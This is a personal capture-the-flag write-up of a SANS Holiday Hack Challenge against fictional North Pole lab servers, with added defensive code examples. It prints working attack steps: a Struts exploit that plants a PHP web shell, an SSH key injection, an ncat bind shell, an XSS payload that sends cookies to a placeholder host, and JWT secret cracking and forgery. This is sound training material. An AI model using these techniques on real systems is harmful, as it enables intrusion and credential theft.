Just Copy/Pasted this from my write-up. I'm sick right now, after getting over an illness during the holiday. Probably plenty of typos and stuff. Finished it the night it was due.
Disappointed with myself this year. Didn't work on it as much as I did other challenges. Sick during holiday break. First with an infection I was taking antibiotics for. Then something else.
Reflected over past year. Brother died last year. He was young, so this was unexpected. Christmas was always his favorite time of year. Wasn't really close to him, but I still regret not spending time with him more often. You just feel like you have a long time, and then they're gone in the blink of an eye.
So my heart just wasn't in it this year. Hopefully this is good enough for now. Might add pics later and hope to solve the rest later.
Update: I'm adding pics and stuff. Feeling a little better. I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups. For example, I don't just know stuff. If I really want to learn stuff, I spend a lot of time looking stuff up. It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others. Don't be discouraged by these write-ups. Be encouraged. If someone like me can do this, so can you. :) Click on any pictures that look small. They look much better in the pop up.
Terminals
1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without-sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html
Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The Candy Cane Striper can only be read and written by root, read by group, read by other.
Don't despair. Even when you only have read permission on a binary and no execute permission, you can still run it without sudo by handing it to the dynamic linker/loader directly: the loader is executable, and it maps and runs the file it is given.
elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper
2. Linux Command Hijacking Terminal
Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory:
ls -la
Unfortunately, this executable isn't as easy to find as the Candy Cane Striper executable.
find / -name elftalkd isn't helpful either.
find is usually run from /usr/bin/find, so using the command
/usr/bin/find / -name elftalkd
finds our executable.
The executable runs out of:
/run/elftalk/bin/elftalkd
So, using the command
/run/elftalk/bin/elftalkd
we can run it.
3. Troublesome Process Terminal
Use
ps aux
to look for the process. It shows that 8 was the pid of the process. Then run:
/bin/kill -9 8
4. Train Startup
The train was compiled to run on an ARM architecture, which file shows:
file trainstartup
file -i trainstartup
This particular Linux kernel runs on an x86 architecture:
uname -a
qemu-arm is an emulator used to run ARM executables on an x86-64 system. So, simply typing:
qemu-arm ./trainstartup
runs the program.
5. IsIt42 Terminal
This one seems similar to library (DLL) path hijacking in Windows. In other words, we exploit the order in which Linux looks for libraries, so that a library we control is consulted before the real C library. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win
Note: This only works for functions the program resolves from a shared C library such as libc. It does not work for functions defined inside the program itself.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() comes from the C library.
Whoever commented the code gave a clue as to what to do, because they noted that the prototype for rand is: int rand(void);
So we write a library of our own that provides rand() with that same prototype and is loaded in place of the C library's version for the isit42 program.
You may use vim or whatever editor you like. Nano is just one of them.
nano isit42test.c
Type the following:
#include <stdio.h>

/* Same prototype as the C library's rand(), so the loader resolves rand() to this copy first. */
int rand(void) {
    printf("Hijacking rand() to return 42.\n");
    return 42;
}
Save the file.
Next, compile it as a shared library. Make sure to add the -shared and -fPIC flags, or gcc won't produce a shared library.
gcc isit42test.c -o isit42test -shared -fPIC
Now our library must be found before the C library that the program references. LD_PRELOAD does exactly that, and the isit42 program is run in the same step:
LD_PRELOAD="$PWD/isit42test" ./isit42
It should return 42.
This next part goes by pretty quickly. When you execute the program with the library preloaded, you'll briefly see it print the message from the printf statement in the library you made. That means you successfully hijacked rand(). You should see the program return 42, and as long as you preload your library it will always return 42.
6. Christmas Songs Data Analysis Terminal
sqlite3 is a command-line program that is often installed on Linux. It is used for querying and analyzing SQLite databases.
sqlite3 christmassongs.db
To see the information about the tables in the databases, you can use the .tables command.
.tables
To see the information about the columns in the tables, you can use the .schema <table> command.
.schema songs
.schema likes
There are two tables in the database. To get the most liked song, we have to tell sqlite3 that we want related information from both tables. In a relational database, rows in two tables are related through primary keys and foreign keys. Here songs.id is the primary key of the songs table, and the same value appears in the likes table as a foreign key under the name songid.
So, part of our query will be "where songs.id=likes.songid".
The dot notation above tells sqlite which table each column comes from: the id column of the songs table and the songid column of the likes table.
Often, as a database grows, an entry gets put into the database more than once. Here the same song title may have been added more than once. Grouping collapses all of the repeat titles into one row.
So, part of our query will be "group by songs.title".
Because a title can appear more than once, the likes for each copy of that title have to be added together. We do this with the "sum" function in SQL.
So, part of our query will be sum(likes.like)
We would like to get the most liked song, so we order by the most liked song in descending order. We limit our query to 10, so that we only return the 10 most liked songs. We could limit it to one, but I wanted to make sure that the query was working as intended.
The full query is below:
select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;
Looks like the Answer is Stairway to Heaven. We'll run the program "runtoanswer" to be sure.
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer
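The join, the grouping and the sum described above can be tried out without the challenge database. The following is an added example written for this write-up, not the challenge's own data or query; it builds an in-memory SQLite database in the shape the text describes (songs(id, title) and likes(id, like, songid)), with constructed rows. It assumes that like is 1 for a like and 0 otherwise, and it deliberately inserts one title twice under different ids, so you can see why grouping by songs.title rather than songs.id matters and why SUM (not COUNT) is the right aggregate. The explicit JOIN ... ON form is equivalent to the "from songs,likes where songs.id=likes.songid" form used in the terminal.

```python
import sqlite3

# Constructed sample data, not the challenge's christmassongs.db. The column
# semantics are an assumption: like = 1 records a like, 0 does not.
SONGS = [
    (1, "Stairway to Heaven"),
    (2, "Jingle Bells"),
    (3, "Stairway to Heaven"),  # same title entered a second time, new id
    (4, "Silent Night"),
]
LIKES = [
    # (id, like, songid)
    (1, 1, 1), (2, 1, 1),
    (3, 1, 2), (8, 0, 2),      # the 0 row is counted by COUNT() but ignored by SUM()
    (4, 1, 3), (5, 1, 3), (6, 1, 3),
    (7, 1, 4),
]


def build_db():
    """Create an in-memory SQLite database holding the sample tables."""
    conn = sqlite3.connect(":memory:")
    # "like" is an SQL keyword, so it is quoted here. The terminal's own query
    # wrote likes.like unquoted, which SQLite also accepts in that position.
    conn.executescript("""
        CREATE TABLE songs (id INTEGER PRIMARY KEY, title TEXT NOT NULL);
        CREATE TABLE likes (id INTEGER PRIMARY KEY, "like" INTEGER NOT NULL,
                            songid INTEGER NOT NULL REFERENCES songs(id));
    """)
    conn.executemany("INSERT INTO songs VALUES (?, ?)", SONGS)
    conn.executemany("INSERT INTO likes VALUES (?, ?, ?)", LIKES)
    conn.commit()
    return conn


def top_songs_by_title(conn, limit=10):
    """The write-up's query: join on the key relationship, collapse repeated
    titles with GROUP BY, add the likes up with SUM, most liked first."""
    rows = conn.execute("""
        SELECT SUM(likes."like") AS total_likes, songs.title
        FROM songs JOIN likes ON songs.id = likes.songid
        GROUP BY songs.title
        ORDER BY total_likes DESC
        LIMIT ?""", (limit,)).fetchall()
    return [(int(total), title) for total, title in rows]


def top_songs_by_id(conn, limit=10):
    """Same query grouped by songs.id instead: a title that was entered twice
    shows up as two rows, each holding only part of its likes."""
    rows = conn.execute("""
        SELECT SUM(likes."like") AS total_likes, songs.id, songs.title
        FROM songs JOIN likes ON songs.id = likes.songid
        GROUP BY songs.id
        ORDER BY total_likes DESC
        LIMIT ?""", (limit,)).fetchall()
    return [(int(total), sid, title) for total, sid, title in rows]


if __name__ == "__main__":
    db = build_db()
    print("grouped by title:", top_songs_by_title(db))
    print("grouped by id:   ", top_songs_by_id(db))
```

Grouped by title, "Stairway to Heaven" comes out on top with 5 likes; grouped by id, the same song is split into a 3 and a 2 and the ranking no longer reflects the real total.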
7. Web Log Terminal Challenge
The goal of this challenge was to analyze an Apache access log to find the least common browser. Fortunately, it is plain text and has well-defined delimiters, so if one has a decent understanding of some Linux command line tools, it shouldn't be tough. If not, Google is your friend. There are many ways to solve this one, only a Google search away. Here is one way:
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - means send the access log file into the next command.
awk -F\" '{print $6}' | - the delimiter in this log is a " character. Separate each line into pieces indicated by this delimiter. I only want the 6th piece. The 6th piece is the user agent string. Send the 6th piece output to the next command.
sort -n | - sort the 6th piece by number of occurrences. Send that output to the next command.
uniq -c - I only want to see unique occurrences of the 6th piece. Send those to the next command.
sort -n | Sort the unique instances of the 6th piece by number of occurrences. Send that output to the next command.
head -n 10 - only show me the first 10 in the output. Since the default order that it is sorted is ascending, the first one of the list will be the least used user agent.
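The same analysis in a form you can run offline: this is an added example for this write-up, not the challenge's access.log or the author's pipeline. It works on a handful of constructed log lines in Apache combined format and mirrors each stage of the pipeline (split on the double-quote delimiter, take the sixth piece, count, order by count ascending). Two details worth knowing when you do this by hand: the first sort in the pipeline only puts identical lines next to each other so that uniq -c can count them (uniq only merges adjacent duplicates), and a log line that lacks the quoted fields yields an empty sixth piece, which the example reports as None rather than counting it as a browser.

```python
from collections import Counter

# Constructed sample lines (not the challenge's log). Apache combined format has
# three double-quoted fields per line: request, referer, user agent.
SAMPLE_LOG = """\
10.0.0.1 - - [25/Dec/2017:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/57.0"
10.0.0.2 - - [25/Dec/2017:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "http://example.test/" "Mozilla/5.0 (Windows NT 10.0) Firefox/57.0"
10.0.0.3 - - [25/Dec/2017:10:00:03 +0000] "GET /login HTTP/1.1" 302 0 "-" "curl/7.55.1"
10.0.0.4 - - [25/Dec/2017:10:00:04 +0000] "POST /login HTTP/1.1" 200 256 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/57.0"
10.0.0.5 - - [25/Dec/2017:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 404 128 "-" "curl/7.55.1"
10.0.0.6 - - [25/Dec/2017:10:00:06 +0000] "GET /admin HTTP/1.1" 403 64 "-" "sqlmap/1.1.12"
broken line with no quoted fields at all
"""


def user_agent(line):
    """Equivalent of awk -F\\" '{print $6}': split on double quotes and take
    the sixth piece. Returns None when the line has too few pieces (awk would
    print an empty string there, which would then be counted as a 'browser')."""
    parts = line.split('"')
    if len(parts) < 6:
        return None
    return parts[5]


def user_agent_counts(log_text):
    """Equivalent of sort | uniq -c: how many times each user agent appears."""
    counts = Counter()
    for line in log_text.splitlines():
        ua = user_agent(line)
        if ua is not None:
            counts[ua] += 1
    return counts


def least_common(log_text, n=10):
    """Equivalent of sort -n | head -n N: the N rarest user agents, rarest
    first. Ties are broken alphabetically so the output is deterministic."""
    counts = user_agent_counts(log_text)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))[:n]


if __name__ == "__main__":
    for ua, count in least_common(SAMPLE_LOG):
        print(f"{count:7d} {ua}")
```

In the sample the rarest agent is the scanner string that appears once, which is also why "least common user agent" is a useful first cut when hunting for tooling in web logs.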
8. Shadow Restoration Challenge
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for
man sudo - found a switch to run as a group. (I did this on another linux box. The game terminal wouldn't let me do it.)
The goal of this one is to restore the shadow file from a backup.
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l
This user has the ability to run the find command. You can see that near the bottom, where it says "User elf may run the following commands...". It also says that the user can run it without a password ("NOPASSWD"), and that elf is a member of the shadow group ("(elf : shadow)").
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can run a command as another user or group. No user's password is known, so use the -g switch to run as a group. The group in Linux responsible for password management (among other things) is the shadow group. The following command works without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} stands for the file find matched, here /etc/shadow.bak. One could write /etc/shadow.bak in place of the {} and it would work just fine; the {} syntax is simply shorter.
The command says: "Run as a member of the shadow group", "Find the shadow backup", "Overwrite the shadow file with the shadow backup".
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box
Holiday Hack Challenge Questions
1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?
The title of that page is About This Book.
2) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?
3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?
FileStor. For the record, I could log onto IPC$ as well. Just couldn’t get a directory listing. Seemed to let me change to another directory, though. Also, it gives a different error message when I try to write to the directory using “put” so it might be writable. FileStor gives NT_STATUS_ACCESS_DENIED opening remote file \test when I try to put test to it. IPC$ gives NT_STATUS_OBJECT_NAME_NOT_FOUND error when I try to put a test file to it.
[Images: SSH port forwarding to the SMB server; the SMB protocol via browser; Finder asking permission to access the share; entering Alabaster's creds to access the share; selecting the share; contents of FileStor]
4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?
[Images: SSH port forwarding to the mail server; setting up the browser proxy in Firefox; the e-mail showing where page 4 was on the mail server; mail server page 4, Rise of the Lollipop Guild]
Elves and Munchkins don’t like each other. They have a long-standing feud. It’s never been proven, but the Elves believe that the Munchkins have sent Munchkin Moles to the North Pole.
5) How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain, and what is your proof?
a) 8 infractions are required to be marked as naughty on Santa’s Naughty and Nice List. (The lowest amount of infractions I could find for a naughty person was 8).
b) The insider moles are: Bog Questrian, Bini Aru - these two are known because they were mentioned in the BOLO:Munchkin Mole Advisory.
[Image: Known Munchkin Moles]
c) The Abominable Snow Monster, AKA Bumble, is throwing the giant snowballs - a page of the great book states that he's throwing the snowballs - however, he's under the influence of something magical that he ate. (If one plays through the game, it's revealed that he is throwing snowballs as well.)
[Images: Great Book page 5; the game reveal]
6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?
[Image: SSH port forwarding to EaaS]
ssh -L 9000:10.142.0.5:80 alabaster_snowball@l2s.northpolechristmastown.com
ssh -L 9001:10.142.0.13:80 alabaster_snowball@l2s.northpolechristmastown.com
7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?
I know from exploiting the e-mail server that one should probably use a DDE Injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words "gingerbread", "cookie," and "recipe". Shinny Upatree also gives the hint in the stocking talking about DDE. He also said that he was reprimanded for a security violation and that Alabaster installs unnecessary software on the EMI server all the time, including Microsoft Office. DDE Injection can be done with Word, Excel, Outlook, Powerpoint - probably more stuff - but those are the products I've seen it done in articles.
Unfortunately, I couldn't get any of my exploit attempts to work. I'll detail my attempts later in this write-up.
8) Fetch the letter to Santa from the North Pole Elf Database at https://edb.northpolechristmastown.com. Who wrote the letter?
I just got into the edb/ldap server on the night that this was due, so I didn't get this one. I did get it afterwards though. I'm holding off on reading write-ups until I solve them. It was the Wizard of Oz. :)
I retrieved the np-auth token via XSS. I knew that I needed the np-auth item because of the web page source code. Click on the Support Link and find the XSS vulnerability. You can use a marker to test, or simply try to pop an alert.
It kept saying "Alert, Hacker" when I tried certain XSS payloads. I just played around with it a bit to find out what it was filtering on. An easier way would have been to check to see if there was any script that contained "Alert, Hacker!". It didn't take long to figure out what it was alerting on, though. It was just the word script. So, I'd have to try payloads that either obfuscated the word "script" or payloads that didn't contain the word script.
It won't let you put the marker in the Username and E-Mail because they have to be a certain format. So, put a valid username and e-mail in each text box and add the marker script to the message. Check the web page source code.
Looks like the Message part is vulnerable. When you look at the source code, that is where this is located.
Try filter evasion payloads until one pops an alert.
Now, change the payload so it dials back to you.
I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine. The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth. I just named it cookie catcher.php because I originally thought I needed a cookie. I only set it up this way because I wanted to be certain I didn't miss it. This script saves the cookies to a log that I can look at later.
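The filter described above blocked the word "script" and nothing else, and an event-handler payload walked straight past it. The following added example (mine, not the EDB application's code) reconstructs that kind of keyword blacklist beside the control that actually neutralizes the input, HTML-encoding on output. The messages are constructed; PAYLOAD_BYPASS is the event-handler form quoted in this write-up with a placeholder host, and the div wrapper stands in for however the real page reflected the support message.

```python
import html
import re


# Reconstruction of the observed check: reject anything containing "script".
# Not the challenge's actual server code.
def blacklist_allows(message):
    """Return True if the keyword blacklist would accept the message."""
    return "script" not in message.lower()


# Constructed inputs. The host x.x.x.x is a placeholder, not a real collector.
HARMLESS = "Hi, my snowball launcher is broken, please help."
PAYLOAD_BLOCKED = "<script>alert(1)</script>"
PAYLOAD_BYPASS = ('<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php'
                  '?cookie="+document.cookie)>')

WRAP_OPEN, WRAP_CLOSE = '<div class="message">', "</div>"


def render_unsafe(message):
    """The vulnerable pattern: user text dropped straight into the page."""
    return WRAP_OPEN + message + WRAP_CLOSE


def render_safe(message):
    """The fix: encode on output. < > & " ' become entities, so whatever the
    blacklist missed is displayed as text instead of parsed as markup."""
    return WRAP_OPEN + html.escape(message, quote=True) + WRAP_CLOSE


# A '<' followed by an optional '/' and a letter is what a browser treats as a tag opener.
TAG_START = re.compile(r"<\s*/?[a-zA-Z]")


def reflected_as_markup(message, renderer):
    """Does the user-controlled part of the rendered page still contain a tag
    opener? This measures the outcome the browser cares about, not a keyword."""
    rendered = renderer(message)
    inner = rendered[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return TAG_START.search(inner) is not None


def evaluate(message):
    """Summarise how each control fares against one message."""
    return {
        "blacklist_allows": blacklist_allows(message),
        "unsafe_has_markup": reflected_as_markup(message, render_unsafe),
        "safe_has_markup": reflected_as_markup(message, render_safe),
    }


if __name__ == "__main__":
    for name, msg in [("harmless", HARMLESS), ("blocked", PAYLOAD_BLOCKED),
                      ("bypass", PAYLOAD_BYPASS)]:
        print(name, evaluate(msg))
```

The blacklist stops the textbook payload and lets the IMG/onerror one through; output encoding leaves no tag opener in either case without needing to know which keyword to look for. If the np-auth token is a cookie, setting HttpOnly on it would also keep document.cookie from exposing it, but that belongs alongside encoding, not in place of it.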
I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap.
I cracked the secret using jwtcrack. It was ‘3lv3s’.
I then used py-jwt to forge a new token with the decoded token and changing the “expires” date.
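The three JWT steps above (decode without a key, recover a short secret, re-sign with a changed expiry) come down to how HS256 tokens are built, and the failure is a weak secret rather than anything subtle. The following added example is mine, written with only the Python standard library rather than pyjwt or jwtcrack, and uses constructed claims and a constructed wordlist; "3lv3s" is the secret value reported in this write-up and STRONG_SECRET is a made-up long one. It shows decoding without verification, verification that pins the algorithm and enforces exp, why a tampered token fails unless the signer knows the secret, and a defender's self-check that a signing secret is not a dictionary word.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed values for the example. STRONG_SECRET is made up; "3lv3s" is the
# weak secret this write-up reports recovering with jwtcrack.
WORDLIST = ["password", "secret", "3lv3s", "santa", "elf"]
STRONG_SECRET = "Vh7!qR2pL9xZ4mT0wB6nK3cD8fG1sJ5y"


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, secret):
    """Build a compact JWT: base64url(header).base64url(claims).HMAC-SHA256."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token):
    """What 'decoding with an empty key' amounts to: read the claims without
    checking the signature. Fine for inspection, never a basis for trust."""
    _, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(payload_b64))


def verify_hs256(token, secret, now=None):
    """Proper verification: algorithm pinned to HS256, constant-time signature
    comparison, expiry enforced. Raises ValueError on any failure."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")  # the token must not choose the algorithm
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    now = time.time() if now is None else now
    if "exp" in claims and now >= float(claims["exp"]):
        raise ValueError("token expired")
    return claims


def check_token(token, secret, now=None):
    """Convenience wrapper: 'ok' or the reason verification failed."""
    try:
        verify_hs256(token, secret, now)
        return "ok"
    except ValueError as err:
        return str(err)


def secret_in_wordlist(token, wordlist):
    """Defender's self-check: if the signing secret is a dictionary word, the
    signature can be reproduced offline from any captured token. Returns the
    matching word, or None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    sig = b64url_decode(sig_b64)
    msg = f"{header_b64}.{payload_b64}".encode()
    for candidate in wordlist:
        if hmac.compare_digest(hmac.new(candidate.encode(), msg, hashlib.sha256).digest(), sig):
            return candidate
    return None


if __name__ == "__main__":
    token = sign_hs256({"uid": "alabaster.snowball", "exp": 1000}, "3lv3s")
    print("claims seen without verifying:", decode_unverified(token))
    print("verify before exp:", check_token(token, "3lv3s", now=500))
    print("verify after exp: ", check_token(token, "3lv3s", now=2000))
    print("weak secret found:", secret_in_wordlist(token, WORDLIST))
```

Changing the "expires" claim and re-signing only passes verification when the signer has the real secret, so the whole control rests on that secret being long and random; a verifier that also rejects any alg other than the one it expects closes the other common shortcut.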
9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?
Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
L2S Server
This server was running Apache Struts, and was vulnerable to the exploit detailed here:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The source indicated that there was another website, dev.northpolechristmastown.com.
The Dev Version shows that it's running Apache Struts.
I used the tool mentioned in the SANS Pen Testing Blog Post mentioned earlier to upload a web shell: CVE-2017-9805.py I named it struts_exploit.py so I would remember what it was way in the future.
python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo 'PGh0bWw+Cjxib2R5Pgo8Zm9ybSBtZXRob2Q9IkdFVCIgbmFtZT0iPD9waHAgZWNobyBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+Ij4KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPgo8aW5wdXQgdHlwZT0iU1VCTUlUIiB2YWx1ZT0iRXhlY3V0ZSI+CjwvZm9ybT4KPHByZT4KPD9waHAKICAgIGlmKCRfR0VUWydjbWQnXSkKICAgIHsKICAgICAgICBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKICAgIH0KPz4KPC9wcmU+CjwvYm9keT4KPHNjcmlwdD5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY21kIikuZm9jdXMoKTs8L3NjcmlwdD4KPC9odG1sPg==' > /var/www/html/quackquackhere.php"
That base64 is a web shell.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
Then you just visit the webpage with your shell file name tacked on the end and the command you want to run.
https://l2s.northpolechristmastown.com/quackquackhere.php?ls
[Images for question 7: SSH port forwarding to the mail server; setting up the proxy in Firefox; Alabaster hinting he will click on anything regarding gingerbread cookies; Tarpin McJinglehauser stating to be on the lookout for certain e-mails; Minty hinting that they may be vulnerable to DDE injection; Alabaster pulling down the file using nc; Alabaster stating that he has nc installed in his $PATH; Alabaster stating that they have PowerShell; Shinny Upatree reprimanded; Shinny Upatree on unnecessary software]
[Images for question 8: the EDB server; the EDB support page; the EDB source; the XSS marker script; the message field vulnerable to XSS; trying payloads until one pops an alert; XSS alert success. The payload that popped the alert and called back to the collector:]
<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>
[Images: Alabaster's JWT token; the blank key; decoding Alabaster's JWT token with PyJWT; cracking the JWT secret with jwtcrack; forging Alabaster Snowball's JWT token]
[Image for question 9: Glenda did it. Can't say I'm surprised. I always suspected she was up to no good.]
[Images for the L2S server: the dev version of L2S; L2S running Apache Struts]
I found it easier to upload my public key into the authorized_keys file and log on via ssh before I found the password. Unfortunately, logging in via ssh left me in a restricted shell.
python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo '<my pub key here>' >> /home/alabaster.snowball/.ssh/authorized_keys"
Pub Key |
I'm not afraid of people having my public key. Now if I showed my private key, that would be another story. I'm reverting to a snap shot on that VM though. So the key won't be on there at any rate whether it's safe or not.
Then I could just ssh in, presenting my private key. Learned this in NetWars. :) Like so:
ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com
Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot- of-tee, to break out of rbash. I was unsuccessful.
I found out that I could do dot (.) sourcing to get around not being able to use /. to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.
https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it
Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that restricts users to the directory I was in, and the path to the programs I was able to run in the restricted shell.
cat /home/alabaster.snowball/.bashrc
Restricting Users to RBash |
So then I ran “ls /usr/local/rbin” to see what programs I could use.
What Can I Execute In RBash? |
I’ve used ncat several times and remembered that I could execute commands with it. So I tried ncat -l 59000 --exec "/bin/bash" &. Then I connected to my listener by typing ncat 127.0.0.1 59000.
If you've ever dealt with ncat, sometimes it is hard to tell that there is a prompt there. It looks like a blank space, but if you type a command, like cd .. and ls, it will show the output. I knew I had escaped because in rbash you can't change directories.
Escaped From RBash |
From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits. Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com
SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB server. smbclient, for whatever reason, wouldn’t work for me. So I instead used ssh forwarding to forward the IP of the SMB server to my machine. I have the pics posted earlier, in the "Holiday Hack Questions" section.
ssh -L 9000:10.142.0.7:445
I didn’t want to use port 445 because I would have to sudo.
My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me if I wanted to open the share with Finder. So, I clicked OK. Then a login prompt popped up. I put in Alabaster Snowball’s credentials. They were username: alabaster_snowball; password: stream_unhappy_buy_loss.
I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.
Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging in via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed “10.142.0.5/robots.txt” into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie: cookie.txt.
The hints for this one were given by Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser, called RunKit + npm. I found the aes256 module and played around with it.
var aes256 = require("aes256"); // version 1.0.2 on RunKit
var key = 'santaisonabender';
var encrypted = 'AAAAAAAAAAAAAAAAAAAAAA';
var plaintext = '';
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted);
console.log(decrypted);
if (decrypted === plaintext) {
console.log('equal');
}
I found out that the IV is completely dropped by this module. In the program, the value is aes256 encrypted and then base64 encoded. So to decrypt, it is base64 decoded and then aes256 decrypted. 22 A’s are required because when the 16 characters of the IV are base64 encoded, they are drawn out to 22 characters. I played with base64 encoding to discover that 16 characters are padded out to 22.
The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared to compare the plaintext variable in the decryption function to the plaintext value in the cookie. The decryption function gets its plaintext value by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still be passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text.
